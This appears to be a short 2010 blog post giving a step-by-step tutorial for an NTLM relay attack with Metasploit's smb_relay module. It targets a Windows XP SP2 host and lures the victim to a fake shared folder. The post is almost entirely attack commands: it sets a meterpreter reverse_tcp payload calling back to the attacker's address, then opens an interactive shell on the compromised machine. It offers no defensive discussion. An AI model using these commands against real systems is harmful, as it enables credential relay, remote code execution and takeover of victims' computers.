Tuesday, March 9, 2010

Tutorial: NTLM Hijacking with SMB Relay Exploit

Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)

Step 1: Prepare the SMB Exploit

cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit

Step 2: Connect to the FAKE shared folder from the remote machine

\\192.168.1.252\shared\xxx.jpg

shared\xxx.jpg is a fake link

Step 3: Interact with the open session

Check the active sessions...
msf > sessions -l

Interact with active session# 1
msf > sessions -i 1

Command shell...
meterpreter > shell

No comments:

Post a Comment